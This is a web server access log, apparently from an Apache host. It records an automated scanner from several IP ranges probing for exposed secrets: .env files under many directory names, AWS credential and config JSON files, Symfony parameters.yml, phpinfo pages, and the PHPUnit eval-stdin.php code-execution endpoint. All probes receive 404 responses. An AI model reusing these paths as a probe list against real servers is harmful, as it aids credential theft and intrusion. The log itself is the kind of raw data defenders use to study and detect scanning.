64.62.197.88 - - [07/Feb/2025:12:15:56 +0200] "GET /dashboard/phpinfo.php HTTP/1.1" 404 219 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
93.234.224.199 - - [07/Feb/2025:12:22:28 +0200] "GET / HTTP/1.0" 200 902 "-" "-"
216.24.210.208 - - [07/Feb/2025:12:24:55 +0200] "GET / HTTP/1.1" 200 902 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15"
216.24.210.194 - - [07/Feb/2025:12:24:56 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 248 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
216.24.210.213 - - [07/Feb/2025:12:24:57 +0200] "GET / HTTP/1.1" 200 902 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:105.0) Gecko/20100101 Firefox/105.0"
173.239.218.146 - - [07/Feb/2025:12:24:58 +0200] "GET / HTTP/1.1" 200 902 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
173.239.218.138 - - [07/Feb/2025:12:24:58 +0200] "GET /.DS_Store HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
173.239.218.142 - - [07/Feb/2025:12:25:00 +0200] "GET /.env HTTP/1.1" 404 202 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
216.24.210.205 - - [07/Feb/2025:12:25:00 +0200] "POST /.env HTTP/1.1" 404 202 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
216.24.210.201 - - [07/Feb/2025:12:25:02 +0200] "GET /.env.save HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
173.239.218.129 - - [07/Feb/2025:12:25:02 +0200] "POST /.env.save HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
216.24.210.222 - - [07/Feb/2025:12:25:04 +0200] "GET /.env.old HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
216.24.210.213 - - [07/Feb/2025:12:25:04 +0200] "POST /.env.old HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
173.239.218.130 - - [07/Feb/2025:12:25:05 +0200] "GET /.env.prod HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
216.24.210.197 - - [07/Feb/2025:12:25:06 +0200] "POST /.env.prod HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
173.239.218.131 - - [07/Feb/2025:12:25:06 +0200] "GET /.env.production HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
216.24.210.218 - - [07/Feb/2025:12:25:08 +0200] "POST /.env.production HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
216.24.210.207 - - [07/Feb/2025:12:25:08 +0200] "GET /.env.development%20 HTTP/1.1" 404 215 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
216.24.210.212 - - [07/Feb/2025:12:25:10 +0200] "POST /.env.development%20 HTTP/1.1" 404 215 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
216.24.210.210 - - [07/Feb/2025:12:25:10 +0200] "GET /laravel/.env%20 HTTP/1.1" 404 211 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15"
216.24.210.219 - - [07/Feb/2025:12:25:12 +0200] "POST /laravel/.env%20 HTTP/1.1" 404 211 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
216.24.210.217 - - [07/Feb/2025:12:25:12 +0200] "GET /admin-app/.env%20 HTTP/1.1" 404 213 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0"
216.24.210.203 - - [07/Feb/2025:12:25:14 +0200] "POST /admin-app/.env%20 HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
173.239.218.133 - - [07/Feb/2025:12:25:14 +0200] "GET /api/.env HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
173.239.218.139 - - [07/Feb/2025:12:25:16 +0200] "POST /api/.env HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
216.24.210.212 - - [07/Feb/2025:12:25:16 +0200] "GET /app/.env%20 HTTP/1.1" 404 207 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
173.239.218.128 - - [07/Feb/2025:12:25:18 +0200] "POST /app/.env%20 HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
216.24.210.222 - - [07/Feb/2025:12:25:18 +0200] "GET /development/.env%20 HTTP/1.1" 404 215 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0"
173.239.218.136 - - [07/Feb/2025:12:25:20 +0200] "POST /development/.env%20 HTTP/1.1" 404 215 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
216.24.210.211 - - [07/Feb/2025:12:25:20 +0200] "GET /apps/.env%20 HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
98.159.37.225 - - [07/Feb/2025:12:25:20 +0200] "POST /apps/.env%20 HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
216.24.210.204 - - [07/Feb/2025:12:25:22 +0200] "GET /cp/.env HTTP/1.1" 404 205 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
216.24.210.212 - - [07/Feb/2025:12:25:22 +0200] "POST /cp/.env HTTP/1.1" 404 205 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
216.24.210.212 - - [07/Feb/2025:12:25:24 +0200] "GET /private/.env HTTP/1.1" 404 210 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
216.24.210.220 - - [07/Feb/2025:12:25:26 +0200] "POST /private/.env HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
173.239.218.127 - - [07/Feb/2025:12:25:27 +0200] "GET /system/.env HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
173.239.218.146 - - [07/Feb/2025:12:25:28 +0200] "POST /system/.env HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
173.239.218.129 - - [07/Feb/2025:12:25:29 +0200] "GET /redmine/.env HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
173.239.218.129 - - [07/Feb/2025:12:25:30 +0200] "POST /redmine/.env HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
216.24.210.200 - - [07/Feb/2025:12:25:31 +0200] "GET /docker/.env HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
173.239.218.134 - - [07/Feb/2025:12:25:32 +0200] "POST /docker/.env HTTP/1.1" 404 209 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0"
173.239.218.136 - - [07/Feb/2025:12:25:32 +0200] "GET /cms/.env HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
216.24.210.196 - - [07/Feb/2025:12:25:34 +0200] "POST /cms/.env HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
216.24.210.194 - - [07/Feb/2025:12:25:35 +0200] "GET /script/.env HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 10.0; rv:105.0) Gecko/20100101 Firefox/105.0"
216.24.210.205 - - [07/Feb/2025:12:25:36 +0200] "POST /script/.env HTTP/1.1" 404 209 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0"
216.24.210.217 - - [07/Feb/2025:12:25:37 +0200] "GET /live_env%20 HTTP/1.1" 404 207 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0"
173.239.218.128 - - [07/Feb/2025:12:25:37 +0200] "POST /live_env%20 HTTP/1.1" 404 207 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0"
173.239.218.131 - - [07/Feb/2025:12:25:38 +0200] "GET /application/.env HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
216.24.210.210 - - [07/Feb/2025:12:25:41 +0200] "POST /application/.env HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
216.24.210.208 - - [07/Feb/2025:12:25:42 +0200] "GET /.env.project%20 HTTP/1.1" 404 211 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
216.24.210.205 - - [07/Feb/2025:12:25:42 +0200] "POST /.env.project%20 HTTP/1.1" 404 211 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0"
216.24.210.208 - - [07/Feb/2025:12:25:49 +0200] "GET /back/.env HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
216.24.210.201 - - [07/Feb/2025:12:25:52 +0200] "POST /back/.env HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
216.24.210.201 - - [07/Feb/2025:12:25:53 +0200] "GET /core/.env HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
216.24.210.218 - - [07/Feb/2025:12:25:54 +0200] "POST /core/.env HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
216.24.210.218 - - [07/Feb/2025:12:25:55 +0200] "GET /docker/.env HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
173.239.218.128 - - [07/Feb/2025:12:25:55 +0200] "POST /docker/.env HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
216.24.210.215 - - [07/Feb/2025:12:25:56 +0200] "GET /fedex/.env HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows NT 10.0; rv:105.0) Gecko/20100101 Firefox/105.0"
216.24.210.218 - - [07/Feb/2025:12:25:57 +0200] "POST /fedex/.env HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
173.239.218.147 - - [07/Feb/2025:12:25:59 +0200] "GET /__tests__/test-become/.env HTTP/1.1" 404 224 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
173.239.218.138 - - [07/Feb/2025:12:25:59 +0200] "POST /__tests__/test-become/.env HTTP/1.1" 404 224 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
216.24.210.213 - - [07/Feb/2025:12:26:00 +0200] "GET /local/.env HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
216.24.210.197 - - [07/Feb/2025:12:26:01 +0200] "POST /local/.env HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
216.24.210.213 - - [07/Feb/2025:12:26:01 +0200] "GET /rest/.env HTTP/1.1" 404 207 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0"
216.24.210.194 - - [07/Feb/2025:12:26:02 +0200] "POST /rest/.env HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
173.239.218.130 - - [07/Feb/2025:12:26:03 +0200] "GET /shared/.env%20 HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
216.24.210.205 - - [07/Feb/2025:12:26:03 +0200] "POST /shared/.env%20 HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
173.239.218.131 - - [07/Feb/2025:12:26:05 +0200] "GET /sources/.env HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
173.239.218.127 - - [07/Feb/2025:12:26:05 +0200] "POST /sources/.env HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
173.239.218.130 - - [07/Feb/2025:12:26:07 +0200] "GET /enviroments/.env.production HTTP/1.1" 404 225 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
173.239.218.141 - - [07/Feb/2025:12:26:07 +0200] "POST /enviroments/.env.production HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
216.24.210.220 - - [07/Feb/2025:12:26:08 +0200] "GET /enviroments/.env HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
173.239.218.130 - - [07/Feb/2025:12:26:09 +0200] "POST /enviroments/.env HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
216.24.210.197 - - [07/Feb/2025:12:26:10 +0200] "GET / HTTP/1.1" 200 902 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
216.24.210.222 - - [07/Feb/2025:12:26:10 +0200] "POST / HTTP/1.1" 404 198 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
173.239.218.146 - - [07/Feb/2025:12:26:10 +0200] "GET /frontend_dev.php/$ HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Windows NT 10.0; rv:105.0) Gecko/20100101 Firefox/105.0"
216.24.210.208 - - [07/Feb/2025:12:26:11 +0200] "GET /debug/default/view?panel=config/frontend_dev.php HTTP/1.1" 404 216 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
216.24.210.211 - - [07/Feb/2025:12:26:11 +0200] "GET /debug/default/view?panel=config HTTP/1.1" 404 216 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
216.24.210.196 - - [07/Feb/2025:12:26:13 +0200] "GET /debug/default/view.html HTTP/1.1" 404 221 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
173.239.218.128 - - [07/Feb/2025:12:26:13 +0200] "GET /debug/default/view HTTP/1.1" 404 216 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
173.239.218.135 - - [07/Feb/2025:12:26:15 +0200] "GET /frontend/web/debug/default/view HTTP/1.1" 404 229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15"
173.239.218.141 - - [07/Feb/2025:12:26:15 +0200] "GET /web/debug/default/view HTTP/1.1" 404 220 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0"
173.239.218.127 - - [07/Feb/2025:12:26:17 +0200] "GET /sapi/debug/default/view HTTP/1.1" 404 221 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
216.24.210.221 - - [07/Feb/2025:12:26:17 +0200] "GET /config.json HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
216.24.210.219 - - [07/Feb/2025:12:26:19 +0200] "GET /AwsConfig.json HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
216.24.210.194 - - [07/Feb/2025:12:26:19 +0200] "GET /awsconfig.json HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
173.239.218.132 - - [07/Feb/2025:12:26:21 +0200] "GET /aws.json HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
216.24.210.202 - - [07/Feb/2025:12:26:21 +0200] "GET /conf.json HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
173.239.218.127 - - [07/Feb/2025:12:26:22 +0200] "GET /env.json HTTP/1.1" 404 206 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0"
216.24.210.201 - - [07/Feb/2025:12:26:23 +0200] "GET /.vscode/sftp.json HTTP/1.1" 404 215 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
173.239.218.146 - - [07/Feb/2025:12:26:23 +0200] "GET /.json HTTP/1.1" 404 203 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
173.239.218.141 - - [07/Feb/2025:12:26:25 +0200] "GET /smtp.json HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
216.24.210.199 - - [07/Feb/2025:12:26:27 +0200] "GET /db.json HTTP/1.1" 404 205 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
::1 - - [07/Feb/2025:12:26:28 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
216.24.210.214 - - [07/Feb/2025:12:26:29 +0200] "GET /sendgrid.json HTTP/1.1" 404 211 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
::1 - - [07/Feb/2025:12:26:29 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
216.24.210.198 - - [07/Feb/2025:12:26:29 +0200] "GET /ws-config.json HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
::1 - - [07/Feb/2025:12:26:30 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
216.24.210.196 - - [07/Feb/2025:12:26:32 +0200] "GET /_wpeprivate/config.json HTTP/1.1" 404 221 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
216.24.210.218 - - [07/Feb/2025:12:26:33 +0200] "GET /deployment-config.json HTTP/1.1" 404 220 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
216.24.210.210 - - [07/Feb/2025:12:26:34 +0200] "GET /sftp-config.json HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
216.24.210.212 - - [07/Feb/2025:12:26:35 +0200] "GET /db/robomongo.json HTTP/1.1" 404 215 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15"
173.239.218.130 - - [07/Feb/2025:12:26:41 +0200] "GET /client_secrets.json HTTP/1.1" 404 217 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:105.0) Gecko/20100101 Firefox/105.0"
173.239.218.146 - - [07/Feb/2025:12:26:42 +0200] "GET /user-config.json HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
216.24.210.215 - - [07/Feb/2025:12:26:43 +0200] "GET /ssh-config.json HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
173.239.218.137 - - [07/Feb/2025:12:26:44 +0200] "GET /database-config.json HTTP/1.1" 404 218 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
173.239.218.127 - - [07/Feb/2025:12:26:44 +0200] "GET /config/default.json HTTP/1.1" 404 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
216.24.210.222 - - [07/Feb/2025:12:26:45 +0200] "GET /config/config.json HTTP/1.1" 404 216 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
173.239.218.140 - - [07/Feb/2025:12:26:45 +0200] "GET /credentials/config.json HTTP/1.1" 404 221 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0"
216.24.210.209 - - [07/Feb/2025:12:26:46 +0200] "GET / HTTP/1.1" 200 902 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
216.24.210.209 - - [07/Feb/2025:12:26:47 +0200] "GET /.aws/credentials HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
216.24.210.223 - - [07/Feb/2025:12:26:48 +0200] "GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
173.239.218.143 - - [07/Feb/2025:12:26:48 +0200] "GET /_profiler/open?file=app/config/parameters.yml HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
216.24.210.212 - - [07/Feb/2025:12:26:49 +0200] "GET /app/config/parameters.yml HTTP/1.1" 404 223 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
173.239.218.136 - - [07/Feb/2025:12:26:49 +0200] "GET /config/parameters.yml HTTP/1.1" 404 219 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0"
173.239.218.139 - - [07/Feb/2025:12:26:50 +0200] "GET /parameters.yml HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
173.239.218.136 - - [07/Feb/2025:12:26:51 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 215 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
173.239.218.132 - - [07/Feb/2025:12:26:52 +0200] "GET /app_dev.php/_profiler/phpinfo HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
216.24.210.205 - - [07/Feb/2025:12:26:53 +0200] "GET /phpinfo.php HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
216.24.210.201 - - [07/Feb/2025:12:26:54 +0200] "GET /info.php HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
